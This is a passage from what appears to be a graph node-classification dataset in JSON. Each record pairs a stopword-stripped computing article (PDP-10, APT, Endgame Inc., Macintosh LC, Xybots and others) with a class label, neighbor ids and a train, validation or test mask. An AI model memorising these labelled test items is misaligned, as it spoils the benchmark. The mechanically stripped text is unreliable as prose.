processors removed 256 kiloword limit virtual address space allowing use 32 sections 256 kilowords along substantial changes instruction set model model b kl10 processors thought different cpus first operating system took advantage model b capabilities tops-20 release 3 user mode extended addressing offered tops-20 release 4 tops-20 versions release 4.1 would run model b. tops-10 versions 7.02 7.03 also use extended addressing run 1090 1091 model b processor running tops-20 microcode final upgrade kl10 mca25 upgrade 2060 2065 1091 1095 gave performance increases programs run multiple sections ks10 design crippled model even though necessary data paths needed support model b architecture present doubt intended segment market greatly shortened ks10 product life frontend processors computers extend functionality systems connected kl class machines started without assistance pdp-11/40 frontend computer installed every system pdp-11 booted dual-ported rp06 disk drive alternatively 8 floppy disk drive dectape commands given pdp-11 start main processor typically booted rp06 disk drive pdp-11 pdp-11 performs watchdog functions main processor running networking remote job entry rje accomplished via pdp-11/34a frontend dec used terms dn60 d60spl ks system uses similar boot procedure 8080 cpu loads microcode rm03 rm80 rp06 disk magnetic tape starts main processor 8080 switches modes operating system boots controls console remote diagnostic serial ports i/o architecture 20xx series kl machines based dec bus design called massbus many attributed success pdp-11 dec decision make pdp-11 unibus open architecture dec reverted prior philosophy kl making massbus unique proprietary consequently aftermarket peripheral manufacturers made devices massbus dec chose price massbus devices notably rp06 disk drive substantial premium comparable ibm-compatible devices compuserve one designed alternative disk controller could operate massbus connect ibm style 3330 disk subsystems two models tape drives supported tm10 magnetic tape control subsystem mix eight could supported providing seven-track /or nine-track devices tu20 tu30 came 9 track b 7 track versions aforementioned tape drives could read/write from/to 200 bpi 556 bpi 800 bpi ibm-compatible tapes tm10 magtape controller available two submodels first pdp-6s model kl-10s user-mode instruction set architecture largely section covers architecture multi-section extended addressing covered decsystem-10/decsystem-20 processor reference manual pdp-10 36-bit words 18-bit word addresses supervisor mode instruction addresses correspond directly physical memory user mode addresses translated physical memory earlier models give user process high low memory addresses 0 top bit used one base register higher addresses used another segment contiguous later architectures paged memory access allowing non-contiguous address spaces cpu general-purpose registers also addressed memory locations 0-15 16 general-purpose 36-bit registers right half registers register 0 may used indexing instructions operate pairs registers pc word consists 13-bit condition register plus 5 always zero bits left half 18-bit program counter right half condition register records extra bits results arithmetic operations e.g overflow accessed instructions two operational modes supervisor user mode besides difference memory referencing described supervisor-mode programs execute input/output operations communication user-mode supervisor-mode done unimplemented user operations uuos instructions defined hardware trapped supervisor mechanism also used emulate operations may hardware implementations cheaper models major datatypes directly supported architecture two complement 36-bit integer arithmetic including bitwise operations 36-bit floating-point halfwords extended 72-bit floating point supported special instructions designed used multi-instruction sequences byte pointers supported special instructions word structured count half pointer half facilitates use bounded regions memory notably stacks instruction set symmetrical every instruction consists 9-bit opcode 4-bit register code 23-bit effective address field consists turn 1-bit indirect bit 4-bit register code 18-bit offset instruction execution begins calculating effective address adds contents given register non-zero offset indirect bit 1 fetches word calculated address repeats effective address calculation effective address zero indirect bit reached resulting effective address used instruction either fetch memory contents simply constant thus example movei a,3 c adds 3 18 lower bits register c puts result register without touching memory three main classes instruction arithmetic logical move conditional jump conditional skip may side effects also several smaller classes arithmetic logical move operations include variants operate immediate-to-register memory-to-register register-to-memory register-and-memory-to-both memory-to-memory since registers may addressed part memory register-to-register operations also defined variants useful though well-defined example add operation variants addi add 18-bit mmediate constant register addm add register contents emory location addb add b oth add register contents memory also put result register elaborate example hlrom h alf l eft r ight nes emory takes left half register contents places right half memory location replaces left half memory location ones halfword instructions also used linked lists hlrz lisp car operator hrrz cdr conditional jump operations examine register contents jump given location depending result comparison mnemonics instructions start jump jumpa meaning jump always jump meaning jump never – consequence symmetric design instruction set contains several no-ops jump example jumpn loc jumps address loc contents register non-zero also conditional jumps based processor condition register using jrst instruction ka10 ki10 jrst faster jumpa standard unconditional jump jrst conditional skip operations compare register memory contents skip next instruction often unconditional jump depending result comparison simple example camn loc compares contents register contents location loc skips next instruction equal elaborate example tlce loc read test left complement skip equal using contents loc mask selects corresponding bits left half register bits e qual zero skip next instruction case replace bits boolean complement smaller instruction classes include shift/rotate instructions procedure call instructions particularly notable stack instructions push pop corresponding stack call instructions pushj popj byte instructions use special format indirect word extract store arbitrary-sized bit fields possibly advancing pointer next unit original pdp-10 operating system simply called monitor later renamed tops-10 eventually pdp-10 system renamed decsystem-10 early versions monitor tops-10 formed basis stanford waits operating system compuserve time-sharing system time pdp-10 operators began running operating systems assembled major components developed outside dec. example main scheduler might come one university disk service another commercial timesharing services compuserve on-line systems ols rapidata maintained sophisticated inhouse systems programming groups could modify operating system needed businesses without dependent dec others also strong user communities decus users share software developed bbn developed alternative operating system tenex fairly quickly became de facto standard research community dec later ported tenex kl10 enhanced considerably named tops-20 forming decsystem-20 line mit developed ctss compatible time-sharing system run ibm 709 later modified ibm 7094 system also developed incompatible timesharing system run pdp-6 later modified pdp-10 naming related since ibm dec/pdp hardware different i.e incompatible despite 36-bit cpu name selected tom knight play ctss name tymshare developed tymcom-x derived tops-10 using page-based file system like tops-20 1971 1972 researchers xerox parc frustrated top company management refusal let buy pdp-10 xerox bought scientific data systems sds 1969 wanted parc use sds machine instead group led charles p. thacker designed constructed two pdp-10 clone systems named maxc pronounced max honour max palevsky sold sds xerox use maxc also backronym multiple access xerox computer maxc ran modified version tenex third-party attempts sell pdp-10 clones relatively unsuccessful see foonly systems concepts xkl one largest collections decsystem-10 architecture systems ever assembled compuserve peak operated 200 loosely coupled systems three data centers columbus ohio compuserve used systems 'hosts providing access commercial applications compuserve information service first systems bought dec dec abandoned pdp-10 architecture favor vax compuserve pdp-10 customers began buying plug compatible computers systems concepts january 2007 compuserve operating small number pdp-10 architecture machines perform billing routing functions main power supplies used kl-series machines inefficient compuserve engineers designed replacement supply used half energy compuserve offered license design kl supply dec free dec would promise new kl bought compuserve would efficient supply installed dec declined offer another modification made pdp-10 compuserve engineers replacing hundreds incandescent indicator lamps ki10 processor cabinet led lamp modules cost conversion easily offset cost savings electricity use reduced heat labor needed replace burned-out lamps digital followed step world picture right hand side shows light panel mf10 memory contemporary ki10 cpu item part computer museum populated leds 2008 demonstration purposes similar banks indicator lamps kl ks processors pdp-10 eventually eclipsed vax superminicomputer machines descendants pdp-11 dec recognized pdp-10 vax product lines competing decided concentrate software development effort profitable vax pdp-10 product line cancellation announced 1983 including cancelling ongoing jupiter project produce new high-end pdp-10 processor despite project good shape time cancellation minnow project produce desktop pdp-10 may prototyping stage event spelled doom technical cultures spawned original jargon file 1990s become something badge honor among old-time hackers cut one teeth pdp-10 pdp-10 assembly language instructions ldb dpb load/deposit byte live functions programming language common lisp see references section lisp article 36-bit word size pdp-6 pdp-10 influenced programming convenience 2 lisp pointers 18 bits one word crowther created adventure prototypical computer adventure game pdp-10 daglow created first computer baseball game 1971 dungeon 1975 first role-playing video game pdp-10 walter bright originally created empire pdp-10 roy trubshaw richard bartle created first mud pdp-10 zork written pdp-10 infocom used pdp-10s game development testing bill gates paul allen originally wrote altair basic using intel 8080 emulator running pdp-10 harvard university founded microsoft shortly software simulation historical computers simh contains module emulate ks10 cpu windows unix-based machine copies dec original distribution tapes available downloads internet running tops-10 tops-20 system may established also available simh ken harrenstien klh10 software unix-like systems emulates kl10b processor extended addressing 4 mw memory ks10 processor 512 kw memory kl10 emulation supports v.442 kl10 microcode enables run final versions tops-10 tops-20 ks10 emulation supports v.262 microcode final version ks10 dec v.130 microcode final versions ks tops-10 tops-20",
    "neighbors": [
      7173,
      2056,
      2062,
      9231,
      9742,
      8732,
      557,
      7739,
      577,
      2625,
      3650,
      7234,
      3142,
      8262,
      1613,
      2638,
      86,
      2650,
      8301,
      634,
      1147,
      11390,
      2179,
      4742,
      2213,
      3238,
      6821,
      8876,
      8879,
      9909,
      9911,
      7867,
      2243,
      8390,
      5840,
      9425,
      11488,
      10981,
      4331,
      5358,
      1776,
      5361,
      5873,
      2811,
      1804,
      273,
      11539,
      9723,
      8474,
      3867,
      2334,
      7983,
      5936,
      10547,
      10557,
      11075,
      1349,
      10569,
      8524,
      7504,
      11604,
      10590,
      1376,
      6502,
      3945,
      7019,
      5492,
      3446,
      7550,
      4992,
      6529,
      11666,
      5033,
      435,
      10680,
      8136,
      1999,
      978,
      477,
      5598,
      5094,
      10220,
      10734,
      3056,
      499,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 8475,
    "label": 7,
    "text": "Densify:densify densify privately held software company based markham ontario canada company provides machine learning analytics services related public cloud utilization billing data deliver savings corporate cloud bill densify co-founded andrew hillier riyaz somani jayanti parmar 1999 2005 gerry smith – previously executive vice president governance solutions compuware corporation joined new ceo company formerly known cirba inc. changed name densify june 2017 delivered service densify patented optimization engine collects analyzes data cloud computing services environments combined advisory services cloud experts report cost explore usage patterns project future trends densify compatible amazon web services microsoft azure google cloud platform hybrid cloud environments densify also introduced complimentary ec2 assessment service help aws users identify risk reduction cost saving opportunities april 2017 idc recognized densify innovator multi-cloud management june 2017 ema research selected densify ema top 3 product stating densify delivers better application performance highest asset utilization lowest cloud spend without requiring special training september 2017 densify awarded best vmworld 2017 gold award recognized impressive find justin warren forbes january 2018 densify rated 9.5/10 zdnet.com recent product review 2018 densify acknowledged leader forrester wave™ report cloud cost monitoring optimization",
    "neighbors": [
      7248,
      4194,
      1935
    ],
    "mask": "None"
  },
  {
    "node_id": 8476,
    "label": 2,
    "text": "APT_(Package_Manager):apt package manager advanced package tool apt free-software user interface works core libraries handle installation removal software debian ubuntu related linux distributions apt simplifies process managing software unix-like computer systems automating retrieval configuration installation software packages either precompiled files compiling source code apt collection tools distributed package named apt significant part apt defined c++ library functions apt also includes command-line programs dealing packages use library three programs codice_1 codice_2 codice_3 commonly used examples apt simple ubiquitous apt package important priority current debian releases therefore included default debian installation apt considered front-end codice_4 friendlier older codice_5 front-end codice_4 performs actions individual packages apt manages relations especially dependencies well sourcing management higher-level versioning decisions release tracking version pinning apt often hailed one debian best features debian developers attribute strict quality controls debian policy major feature apt way calls codice_4 — topological sorting list packages installed removed calls codice_4 best possible sequence cases utilizes codice_9 options codice_4 however unable calculate avoid reason codice_4 requires action forced user indicates one packages installed package name phrased name portion package fully qualified filename instance debian system libc6 would argument provided codice_12 notably apt automatically gets installs packages upon indicated package depends necessary original distinguishing characteristic apt-based package management systems avoided installation failure due missing dependencies type dependency hell another distinction remote repository retrieval packages apt uses location configuration file codice_13 locate desired packages might available network removable storage medium example retrieve also obtain information available installed packages apt provides command options override decisions made apt-get conflict resolution system one option force particular version package downgrade package render dependent software inoperable user must careful finally codice_14 mechanism allows user create alternative installation policy individual packages user specify packages posix regular expression apt searches cached list packages lists dependencies must installed updated apt retrieves configures installs dependencies automatically triggers treatment deferred actions usage modes apt apt-get facilitate updating installed packages include codice_19 apt configuration folders files apt-config apt configuration query program codice_20 shows configuration apt relies concept repositories order find software resolve dependencies apt repository directory containing packages along index file specified networked cdrom location debian project keeps central repository 25,000 software packages ready download installation number additional repositories added apt sources.list configuration file codice_13 queried apt graphical front-ends often allow modifying codice_29 simply apt-setup package repository specified like system installation packages repository installed without specifying source kept up-to-date automatically addition network repositories compact discs storage media usb keydrive hard disks ... used well using apt-cdrom adding codice_33 source list file apt-cdrom specify different folder cd-rom using codice_34 option i.e hard disk usb keydrive debian cds available download contain debian repositories allows non-networked machines upgraded also one use apt-zip problems may appear several sources offer package systems possibly conflicting sources use apt pinning control sources preferred apt pinning feature allows administrators force apt choose particular versions packages may available different versions different repositories allows administrators ensure packages upgraded versions may conflict packages system sufficiently tested unwelcome changes order pins apt preferences file codice_35 must modified although graphical front-ends often make pinning simpler several front-ends apt exist provide advanced installation functions intuitive interfaces include apt front-ends apt front-ends list dependencies packages installed upgraded ask administrator packages recommended suggested newly installed packages installed automatically install dependencies perform operations system removing obsolete files packages original effort led apt-get program dselect replacement project known codename deity project commissioned brian white debian release manager time first functional version apt-get called dpkg-get intended test program core library functions would underpin new ui much original development apt done irc records lost 'deity creation team mailing list archives include major highlights deity name abandoned official name project due concerns religious nature name apt name eventually decided considerable internal public discussion ultimately name proposed irc accepted finalized mailing lists apt introduced 1998 original test builds circulated irc first debian version included debian 2.1 released 9 march 1999 end original goal deity project replacing dselect user interface ui failure work ui portion project abandoned ui directories removed cvs system first public release apt-get response apt dselect method command line utility great positive development efforts focused maintaining improving tool much later several independent people built uis top libapt-pkg eventually new team picked project began build new features released version 0.6 apt introduced secure apt feature using strong cryptographic signing authenticate package repositories apt originally designed front-end dpkg work debian codice_36 packages version apt modified also work rpm package manager system released apt-rpm fink project ported apt mac os x package management tasks apt also available opensolaris apt-file command packaged separately apt find package includes specific file list files included package remote repositories",
    "neighbors": [
      2050,
      10760,
      7181,
      8213,
      8727,
      6680,
      4123,
      9245,
      5155,
      5670,
      7722,
      5677,
      3131,
      3649,
      10817,
      3654,
      1107,
      3667,
      6227,
      4192,
      11363,
      3685,
      9324,
      10860,
      6257,
      1138,
      2168,
      5755,
      7293,
      1668,
      2180,
      6797,
      8848,
      11410,
      10900,
      10394,
      4775,
      6828,
      3245,
      5819,
      190,
      9407,
      4302,
      2259,
      6361,
      8413,
      741,
      231,
      2281,
      7913,
      7920,
      9971,
      2804,
      6393,
      5369,
      11525,
      2310,
      7435,
      7947,
      9487,
      788,
      1813,
      5397,
      8476,
      6445,
      6446,
      7983,
      1842,
      823,
      2872,
      5962,
      3918,
      4951,
      9564,
      4957,
      2401,
      1379,
      5990,
      9063,
      9064,
      8554,
      7020,
      10096,
      2417,
      2930,
      7027,
      1396,
      9074,
      8068,
      3462,
      8582,
      2955,
      2448,
      11669,
      926,
      8112,
      439,
      6583,
      10172,
      9151,
      10687,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      975,
      2010,
      3550,
      7140,
      6119,
      5096,
      5612,
      8177,
      1522,
      3573,
      3068,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 8477,
    "label": 1,
    "text": "Integrated_test_facility:integrated test facility integrated test facility itf creates fictitious entity database process test transactions simultaneously live input used incorporate test transactions normal production run system advantage periodic testing require separate test processes however careful planning necessary test data must isolated production data moreover itf validates correct operation transaction application ensure system operated correctly integrated test facility considered useful audit tool audit uses programs compare processing using independently calculated data involves setting dummy entities application system processing test production data entity means verifying processing accuracy",
    "neighbors": [
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8478,
    "label": 4,
    "text": "Endgame,_Inc.:endgame inc endgame provides cyber operations platform supporting detection exploitation mitigation cyber-threats endgame started executives iss internet security systems endgame started 2008 chris rouland executives previously worked cia iss october 2010 saw investment 29 million usd raised bessemer ventures columbia capital kleiner perkins caufield byers kpcb techoperators company offers commercial web-based malware detection services defensive digital security intelligence big data analysis software february 2011 company announced partnerships hewlett-packard ibm use endgame ip reputation intelligence service within hp tippingpoint digital vaccine service ibm managed services offerings month emails sent hb gary endgame leaked revealed company sold zero-day vulnerabilities 2014 endgame moved away zero-day exploitations identifying protecting consumers potential cyber threats endgame offers services companies within financial services industry consumer technology companies software company collects information data sources accessed consumers identifying potential security threats december 2012 endgame announced appointment nathaniel fick chief executive officer replacing chris rouland former marine author bestseller one bullet away fick previously ceo center new american security independent nonpartisan national security defense policy research institution remains operating partner bessemer venture partners march 2013 endgame closed 23 million series b equity financing stated purpose fund growth existing federal customer base well expand commercial market round led new investor paladin capital group multi-stage private equity firm included participation existing investors bessemer venture partners columbia capital kleiner perkins caufield byers techoperators endgame initially became known providing cyber intelligence us agencies national security agency 2013 expanded financial commercial clients within private sector raising additional 30 million funding investment edgemore capital top tier capital partners savano capital partners endgame offers defensive analytics company network servers data exploits endgame acquired onyxware 2014 florida-based mobile security technology company provides applications detecting third-party network threats november 2014 endgame boasts approximately 100 employees endgame board directors led christopher darby president ceo in-q-tel independent strategic investment firm supporting missions intelligence community endgame announced march 2013 kenneth minihan former director national security agency managing director paladin also joined board directors april 2014 james n. miller former secretary defense policy appointed board advisers niloofar howe appointed chief strategy officer jamie butler serves chief scientist jon brody senior vice president marketing jim tosh vice president engineering",
    "neighbors": [
      8320,
      5986,
      10309,
      5384,
      1994,
      10539,
      7887,
      7515,
      6005,
      3323,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8479,
    "label": 9,
    "text": "Meta-circular_evaluator:meta-circular evaluator computing meta-circular evaluator mce meta-circular interpreter mci interpreter defines feature interpreted language using similar facility interpreter host language example interpreting lambda application may implemented using function application meta-circular evaluation prominent context lisp self-interpreter meta-circular interpreter interpreted language nearly identical host language two terms often used synonymously dissertation corrado böhm describes design self-hosting compiler self-interpreter meta-circular interpreter host language also language interpreted self-interpreter displays universal function language question helpful learning certain aspects language self-interpreter provide circular vacuous definition language constructs thus provides little insight interpreted language semantics example evaluation strategy addressing issues produces general notion definitional interpreter combination existing language implementation meta-circular interpreters provide baseline system extend language either upwards adding features downwards compiling away features rather interpreting also useful writing tools tightly integrated programming language sophisticated debuggers language designed meta-circular implementation mind often suited building languages general even ones completely different host language many languages one meta-circular implementations partial list languages meta-circular implementation designed bottom grouped chronological order languages meta-circular implementation via third parties",
    "neighbors": [
      6016,
      3462,
      10246,
      9245,
      6047,
      5031,
      4777,
      5677,
      2352,
      8628,
      438,
      10043,
      4799,
      3904,
      8262,
      11087,
      219,
      10083,
      8421,
      6502,
      8554,
      2798,
      8430,
      9454,
      9714,
      3705
    ],
    "mask": "Train"
  },
  {
    "node_id": 8480,
    "label": 3,
    "text": "Macintosh_LC:macintosh lc macintosh lc personal computer designed manufactured sold apple computer inc. october 1990 march 1992 first macintosh lc family lc introduced macintosh classic repackaging older macintosh plus macintosh iisi new entry-level machine macintosh ii series offered half price macintosh ii significantly lesser performance overall creation lc prompted apple desire produce product could sold school boards price apple ii designed inexpensive manufacturing five major components robots could assemble computer 2400 list price new 600 12-inch color display 3500 less expensive macintosh ii long apple iie card introduced lc apple officially announced retirement ii company wanted focus sales marketing efforts lc original macintosh lc introduced october 1990 initial shipments dealers following december january replaced macintosh lc ii largely built around motorola 68030 processor lc uses pizza box case processor direct slot pds nubus slots 16 mhz 68020 microprocessor lacks floating-point coprocessor although one could added via pds lc 16-bit data bus major performance bottleneck 68020 32-bit cpu lc memory management chipset places limit 10 mb ram matter much installed lc shipped 256 kb vram supporting display resolution 512×384 pixels 8-bit color vram upgradeable 512 kb supporting display resolution 512×384 pixels 16-bit color 640×480 pixels 8-bit color lc commonly purchased apple 12 rgb monitor fixed resolution 512×384 pixels form factor exactly matching width lc chassis giving two together near all-in-one appearance apple 13 640×480 trinitron display also available list price 999 cost almost much lc introduction lc lowest resolution supported color macs 640×480 many programs written color macintosh ii family computers assumed minimum unusable lower resolution several years software developers add support smaller screen resolution order guarantee software would run lcs well color classics use resolution overall general performance machine disappointing due crippling data bus bottleneck making run far slower 16 mhz 68020-based macintosh ii 1987 identical processor ran almost twice fast one difference mac ii mac lc latter socket 68851 mmu therefore could take advantage system 7 virtual memory features standard configuration included floppy drive 40 mb 80 mb hard drive version available education market apple ii card pds slot two floppy drives hard drive lc final macintosh model allow dual internal floppy drives lc macs day featured built-in networking serial port using localtalk ethernet also available option via single pds slot single expansion slot limitation multifunction cards available combining ethernet functionality mmu fpu socket apple iie card pds slot offered bundle education models lcs card allowed lc emulate apple iie combination low-cost color macintosh apple iie compatibility intended encourage education market transition aging apple ii models macintosh platform instead new low-cost ibm pc compatibles despite lc minimal video specs 12 monitor lc supports card switched 560×384 resolution better compatibility iie 280×192 high-resolution graphics essentially doubled introduced october 15 1990",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      7286,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      6415,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      3911,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      5520,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6129,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8481,
    "label": 3,
    "text": "Xilleon:xilleon xilleon brand family socs combining low-power cpu asics accelerated video decompression functions major worldwide broadcast networks including pal ntsc secam atsc targeting digital television i.e products like set-top boxes integrated digital television digital television adapters smart tvs etc. xilleon-branded socs revealed next generation avivo named unified video decoder uvd based xilleon video processor provide hardware decoding h.264 vc-1 video codec standards amd trueaudio amd unified video decoder uvd based cadence tensilica xtensa processor originally licensed ati technologies inc. 2004 owner brand xilleon ati technologies later advanced micro devices broadcom amd announced completion acquisition ati technologies third quarter 2006 xilleon products would sold amd brand amd xilleon august 25 2008 xilleon line sold semiconductor company broadcom new line xilleon video processors flat panel lcd tvs named xilleon panel processors four models 410 411 420 421 announced ces 2008 supporting 1080p video resolution featuring technology advanced motion estimation motion compensation frame rate conversion technology based enhanced phase-plane correlation technology converts 24 60 hz input video signals 100 120 hz refresh rates used lcd tvs creating additional frames form smoother motion amd signed agreement divx inc. allow several future xilleon video processors implement hardware divx video decoding divx certification january 2008 however result company restructuring amd divested digital tv chipset business starting second quarter 2008",
    "neighbors": [
      4098,
      8327,
      8711,
      783,
      7445,
      9368,
      9851,
      4124,
      5028,
      6057,
      938,
      426,
      8237,
      1461,
      7234,
      1480,
      10316,
      6247,
      6250,
      6252,
      6253,
      1776,
      6256,
      5237,
      760,
      3451
    ],
    "mask": "Test"
  },
  {
    "node_id": 8482,
    "label": 2,
    "text": "Comparison_of_IPv6_support_in_operating_systems:comparison ipv6 support operating systems comparison operating systems regard support ipv6 protocol",
    "neighbors": [
      5472,
      10144,
      6724,
      649,
      7595,
      4687,
      8976,
      11184,
      7733,
      1304,
      11673,
      4891,
      2168,
      10461,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 8483,
    "label": 1,
    "text": "China_Economic_Databases:china economic databases china economic databases ced project china studies center national chengchi university taiwan collects publishes information china economic development support scholarly research ced available chinese english ced designed scholars students interested study development economy china anyone able add information platform submitting relevant material ced sponsored center china studies national chengchi university taiwan supported taiwan ministry education project launched december 2003 currently directed dr. chen-yuan tung professor graduate institute development studies national chengchi university currently ten databases 1 china economic literature index database china economic literature database celd currently collects data 47 chinese periodicals 22 english sources additionally online databases ssci econlit used keep database up-to-date information celd range topics including macroeconomics capital investment regional development economical reform trade taiwan mainland china chinese foreign trade renminbi exchange economical globalization financial policy financial reform search function also available ease data collecting currently celd approximately 3,000 papers july 2007 2 china economic experts database 3 china economic books database china economic books database cebd main purpose form comprehensive listing books topic china ’ economy cebd includes titles world including english chinese traditional simplified titles subjects books cebd include china economic globalization regional economy international trade rmb exchange rate domestic economic development financial market industry development commerce investment overall economic policy evaluation analysis every book cebd listed relevant search info author/editor ’ name publisher publication date isbn key word classification full listing cebd data sources found 4 china economic websites database china economic websites database collects relevant websites categorizes easy use according various aspects china economy 5 china economic government reports database china economic policy reports database ceprd platform holds economic policy reports chinese government white papers database currently lists reports since 2000 english chinese range content included national development plans agricultural policy monetary policy system reform policy financial market supervision policy commercial investment reports economical operation reports balance payment reports reports listed according policy name issuing unit date issued content summary source along full text linking download capabilities complete list sources please see following link 6 china economic analysis reports database china economic reports database cerd offers reports related indicators china ’ economy gdp cpi investment import export volumes reports published biweekly monthly annually therefore cerd constantly updated reports listed along title publishing institution content abstract 7 china economic conference database china economic conference database cecd offers information upcoming conferences related china ’ economy aims set platform scholars communicate issues china ’ economy also advertise promote conferences information includes theme conference date venue sponsor agenda conference link 8 china economic call papers database china economic call papers database related conference database providing up-to-date info upcoming current calls papers related forthcoming conferences dealing china economy 9 renminbi database renminbi rmb database focused relevant materials towards rmb research content includes rmb reports academic journals books research papers policy reports research meetings syllabus within sub-databases china economic databases platform 10 opencourseware ocw project gathers syllabi related course materials promote research learning field china economy february 2008 ocw site approaching 100 courses schools harvard yale johns hopkins peking university 1 china economic database e-paper english-language publications bi-weekly china economic databases e-paper available online e-paper gives updates recent journals books people republic china government white papers policy reports china economic analysis monthly published online reports recent macroeconomic developments e-paper china economic analysis monthly available traditional simplified chinese 2 china economic analysis monthly monthly publication provides indepth look china economy featuring graphs text various sectors china economy valuable tool scholars currently publication text chinese 3 china economic world ranking report china economic world ranking report gives clear overview china position world economy currently report available chinese however ranking tables listed english chinese",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8484,
    "label": 3,
    "text": "Xybots:xybots xybots 1987 third-person shooter arcade game atari games xybots two players control major rock hardy captain ace gunn must travel 3d maze fight series robots known xybots whose mission destroy mankind game features split screen display showing gameplay bottom half screen information player status current level top half designed ed logg originally conceived sequel previous title gauntlet game well received reviewers lauding game various features particularly cooperative multiplayer aspect despite met limited financial success attributed unique control scheme involves rotating joystick turn player character xybots ported various personal computers atari lynx handheld versions nintendo entertainment system sega genesis/mega drive announced never released emulated versions arcade game later released part various compilations starting midway arcade treasures 2 2004 two players navigate corridors either rock hardy ace gunn battling enemy xybots laser gun seeking cover enemy fire behind various objects attempting reach level exit certain levels players face large boss xybot players move using joystick also rotates turn player character lower half screen shows gameplay area players upper half split map current level status display player display shows player remaining energy replenished collecting energy pods within levels energy also purchased shops levels using coins dropped defeated xybots player also purchase power-ups shops including extra armor increased speed strength firepower along maze enemy maps concept game born attempt designer ed logg engineer/technician doug snyder create first-person video game without specialized hardware 2005 logg recalled trouble controls game building controls worked game design getting players realize could rotate joystick turn in-game characters difficulties logg unsure game would enter mass production originally logg envisioned game second sequel gauntlet titled gauntlet iii catacombs however marketing department atari games want make another gauntlet game made change title logg co-programmer bob flannagan eventually settled theme based major havoc previous atari arcade game upon release game positively reviewed drew favorable comparisons berzerk gauntlet maze-like stages shooting gameplay game various features including cooperative gameplay praised computer video games games machine citing aspects made game addictive commodore user also cited two-player game highlight saying real appeal team game mate running place covering dividing destroying robots maze lending one another gold coins shop ed logg recalled 2005 game financial success gamestm wrote xybots overlooked arcades due complex controls tricky gameplay lack earnings arcades reason sequel ever developed retrospect wrote game ahead time offered unique experience similar games era unable match xybots ported various contemporary computers msx commodore 64 amstrad zx spectrum atari st commodore amiga received ports 1991 atari games subsidiary tengen released version game portable atari lynx version sega genesis/mega drive tengen announced 1990 winter consumer electronics show alongside ports atari games titles paperboy hard drivin latter two games released system xybots planned nintendo entertainment system port tengen also went unreleased acquired rights atari games arcade library parent company williams midway released arcade version xybots part 2004 console compilation midway arcade treasures 2 well midway arcade treasures deluxe edition microsoft windows.the arcade version also saw release psp part midway arcade treasures extended play dissolution midway 2009 warner bros. interactive entertainment picked rights midway arcade titles releasing xybots playstation 3 xbox 360 part midway arcade origins various platforms lego dimensions midway arcade level pack",
    "neighbors": [
      7269,
      8937,
      6797,
      9006,
      1776,
      4856,
      7281,
      9951,
      4152,
      9627,
      5340,
      95
    ],
    "mask": "None"
  },
  {
    "node_id": 8485,
    "label": 6,
    "text": "Volume_serial_number:volume serial number volume serial number serial number assigned disk volume tape volume originated 1950s mainframe computer operating systems os/360 line human-configurable maximum length six characters uppercase must start letter identifies volume system unique manner example sysres often used system residence volume fat ntfs file systems volume serial number feature used determine disk present drive detect exchanged another one identification system created microsoft ibm development os/2 introduced ms-dos 4.01 1988 volume serial number 32-bit number determined date time real-time clock current computer time disk formatting previously method used discern whether disk swapped identified reading drive volume label much similar concept os/360 however even time volume label required unique optional therefore many users given disks meaningful name old method failed",
    "neighbors": [
      3841,
      9762,
      1801,
      7244,
      9166,
      2193,
      7836
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8486,
    "label": 2,
    "text": "Funtouch_OS:funtouch os funtouchos operating system created vivo fork google operating system android major difference android funtouch os latter includes features unavailable former features include customizable gestures communication drawer bottom top swipe security centre lock screen resize options long screen shot eye protection changing warmer color temperature others funtouch os respects looks similar ios made apple list funtouchos releases",
    "neighbors": [
      4995,
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8870,
      1191,
      1959,
      937,
      1578,
      5546,
      6057,
      5677,
      7595,
      7983,
      10537,
      3380,
      5431,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      332,
      4685,
      3664,
      2001,
      3409,
      2259,
      8019,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      5620,
      11252,
      7548,
      2045,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 8487,
    "label": 2,
